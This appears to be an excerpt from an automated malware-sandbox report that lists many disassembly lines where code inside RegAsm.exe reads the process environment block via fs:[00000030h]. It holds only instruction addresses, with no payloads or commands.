Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2437C mov eax, dword ptr fs:[00000030h]	3_2_02D2437C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3F367 mov eax, dword ptr fs:[00000030h]	3_2_02D3F367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C87370 mov eax, dword ptr fs:[00000030h]	3_2_02C87370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C87370 mov eax, dword ptr fs:[00000030h]	3_2_02C87370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C87370 mov eax, dword ptr fs:[00000030h]	3_2_02C87370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBA30B mov eax, dword ptr fs:[00000030h]	3_2_02CBA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBA30B mov eax, dword ptr fs:[00000030h]	3_2_02CBA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBA30B mov eax, dword ptr fs:[00000030h]	3_2_02CBA30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7C310 mov ecx, dword ptr fs:[00000030h]	3_2_02C7C310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA0310 mov ecx, dword ptr fs:[00000030h]	3_2_02CA0310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0930B mov eax, dword ptr fs:[00000030h]	3_2_02D0930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0930B mov eax, dword ptr fs:[00000030h]	3_2_02D0930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0930B mov eax, dword ptr fs:[00000030h]	3_2_02D0930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAF32A mov eax, dword ptr fs:[00000030h]	3_2_02CAF32A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C77330 mov eax, dword ptr fs:[00000030h]	3_2_02C77330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4132D mov eax, dword ptr fs:[00000030h]	3_2_02D4132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4132D mov eax, dword ptr fs:[00000030h]	3_2_02D4132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov ecx, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov ecx, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov ecx, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov ecx, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C970C0 mov eax, dword ptr fs:[00000030h]	3_2_02C970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D550D9 mov eax, dword ptr fs:[00000030h]	3_2_02D550D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D020DE mov eax, dword ptr fs:[00000030h]	3_2_02D020DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFD0C0 mov eax, dword ptr fs:[00000030h]	3_2_02CFD0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFD0C0 mov eax, dword ptr fs:[00000030h]	3_2_02CFD0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA90DB mov eax, dword ptr fs:[00000030h]	3_2_02CA90DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C880E9 mov eax, dword ptr fs:[00000030h]	3_2_02C880E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7A0E3 mov ecx, dword ptr fs:[00000030h]	3_2_02C7A0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA50E4 mov eax, dword ptr fs:[00000030h]	3_2_02CA50E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA50E4 mov ecx, dword ptr fs:[00000030h]	3_2_02CA50E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7C0F0 mov eax, dword ptr fs:[00000030h]	3_2_02C7C0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC20F0 mov ecx, dword ptr fs:[00000030h]	3_2_02CC20F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8208A mov eax, dword ptr fs:[00000030h]	3_2_02C8208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7D08D mov eax, dword ptr fs:[00000030h]	3_2_02C7D08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB909C mov eax, dword ptr fs:[00000030h]	3_2_02CB909C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAD090 mov eax, dword ptr fs:[00000030h]	3_2_02CAD090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAD090 mov eax, dword ptr fs:[00000030h]	3_2_02CAD090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C85096 mov eax, dword ptr fs:[00000030h]	3_2_02C85096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D460B8 mov eax, dword ptr fs:[00000030h]	3_2_02D460B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D460B8 mov ecx, dword ptr fs:[00000030h]	3_2_02D460B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2705E mov ebx, dword ptr fs:[00000030h]	3_2_02D2705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2705E mov eax, dword ptr fs:[00000030h]	3_2_02D2705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C82050 mov eax, dword ptr fs:[00000030h]	3_2_02C82050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB052 mov eax, dword ptr fs:[00000030h]	3_2_02CAB052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D55060 mov eax, dword ptr fs:[00000030h]	3_2_02D55060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov ecx, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C91070 mov eax, dword ptr fs:[00000030h]	3_2_02C91070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAC073 mov eax, dword ptr fs:[00000030h]	3_2_02CAC073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFD070 mov ecx, dword ptr fs:[00000030h]	3_2_02CFD070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E016 mov eax, dword ptr fs:[00000030h]	3_2_02C9E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E016 mov eax, dword ptr fs:[00000030h]	3_2_02C9E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E016 mov eax, dword ptr fs:[00000030h]	3_2_02C9E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E016 mov eax, dword ptr fs:[00000030h]	3_2_02C9E016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7A020 mov eax, dword ptr fs:[00000030h]	3_2_02C7A020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7C020 mov eax, dword ptr fs:[00000030h]	3_2_02C7C020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4903E mov eax, dword ptr fs:[00000030h]	3_2_02D4903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4903E mov eax, dword ptr fs:[00000030h]	3_2_02D4903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4903E mov eax, dword ptr fs:[00000030h]	3_2_02D4903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4903E mov eax, dword ptr fs:[00000030h]	3_2_02D4903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D461C3 mov eax, dword ptr fs:[00000030h]	3_2_02D461C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D461C3 mov eax, dword ptr fs:[00000030h]	3_2_02D461C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBD1D0 mov eax, dword ptr fs:[00000030h]	3_2_02CBD1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBD1D0 mov ecx, dword ptr fs:[00000030h]	3_2_02CBD1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D551CB mov eax, dword ptr fs:[00000030h]	3_2_02D551CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE1D0 mov eax, dword ptr fs:[00000030h]	3_2_02CFE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE1D0 mov eax, dword ptr fs:[00000030h]	3_2_02CFE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE1D0 mov ecx, dword ptr fs:[00000030h]	3_2_02CFE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE1D0 mov eax, dword ptr fs:[00000030h]	3_2_02CFE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CFE1D0 mov eax, dword ptr fs:[00000030h]	3_2_02CFE1D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA51EF mov eax, dword ptr fs:[00000030h]	3_2_02CA51EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C851ED mov eax, dword ptr fs:[00000030h]	3_2_02C851ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D561E5 mov eax, dword ptr fs:[00000030h]	3_2_02D561E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB01F8 mov eax, dword ptr fs:[00000030h]	3_2_02CB01F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC0185 mov eax, dword ptr fs:[00000030h]	3_2_02CC0185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0019F mov eax, dword ptr fs:[00000030h]	3_2_02D0019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0019F mov eax, dword ptr fs:[00000030h]	3_2_02D0019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0019F mov eax, dword ptr fs:[00000030h]	3_2_02D0019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0019F mov eax, dword ptr fs:[00000030h]	3_2_02D0019F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7A197 mov eax, dword ptr fs:[00000030h]	3_2_02C7A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7A197 mov eax, dword ptr fs:[00000030h]	3_2_02C7A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7A197 mov eax, dword ptr fs:[00000030h]	3_2_02C7A197
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3C188 mov eax, dword ptr fs:[00000030h]	3_2_02D3C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3C188 mov eax, dword ptr fs:[00000030h]	3_2_02D3C188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CD7190 mov eax, dword ptr fs:[00000030h]	3_2_02CD7190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D311A4 mov eax, dword ptr fs:[00000030h]	3_2_02D311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D311A4 mov eax, dword ptr fs:[00000030h]	3_2_02D311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D311A4 mov eax, dword ptr fs:[00000030h]	3_2_02D311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D311A4 mov eax, dword ptr fs:[00000030h]	3_2_02D311A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9B1B0 mov eax, dword ptr fs:[00000030h]	3_2_02C9B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D55152 mov eax, dword ptr fs:[00000030h]	3_2_02D55152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C79148 mov eax, dword ptr fs:[00000030h]	3_2_02C79148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C79148 mov eax, dword ptr fs:[00000030h]	3_2_02C79148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C79148 mov eax, dword ptr fs:[00000030h]	3_2_02C79148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C79148 mov eax, dword ptr fs:[00000030h]	3_2_02C79148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7C156 mov eax, dword ptr fs:[00000030h]	3_2_02C7C156
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D14144 mov eax, dword ptr fs:[00000030h]	3_2_02D14144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D14144 mov eax, dword ptr fs:[00000030h]	3_2_02D14144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D14144 mov ecx, dword ptr fs:[00000030h]	3_2_02D14144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D14144 mov eax, dword ptr fs:[00000030h]	3_2_02D14144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D14144 mov eax, dword ptr fs:[00000030h]	3_2_02D14144
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C87152 mov eax, dword ptr fs:[00000030h]	3_2_02C87152
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C86154 mov eax, dword ptr fs:[00000030h]	3_2_02C86154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C86154 mov eax, dword ptr fs:[00000030h]	3_2_02C86154
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D19179 mov eax, dword ptr fs:[00000030h]	3_2_02D19179
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7F172 mov eax, dword ptr fs:[00000030h]	3_2_02C7F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D40115 mov eax, dword ptr fs:[00000030h]	3_2_02D40115
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2A118 mov ecx, dword ptr fs:[00000030h]	3_2_02D2A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2A118 mov eax, dword ptr fs:[00000030h]	3_2_02D2A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2A118 mov eax, dword ptr fs:[00000030h]	3_2_02D2A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D2A118 mov eax, dword ptr fs:[00000030h]	3_2_02D2A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB0124 mov eax, dword ptr fs:[00000030h]	3_2_02CB0124
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B136 mov eax, dword ptr fs:[00000030h]	3_2_02C7B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B136 mov eax, dword ptr fs:[00000030h]	3_2_02C7B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B136 mov eax, dword ptr fs:[00000030h]	3_2_02C7B136
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B136 mov eax, dword ptr fs:[00000030h]	3_2_02C7B136
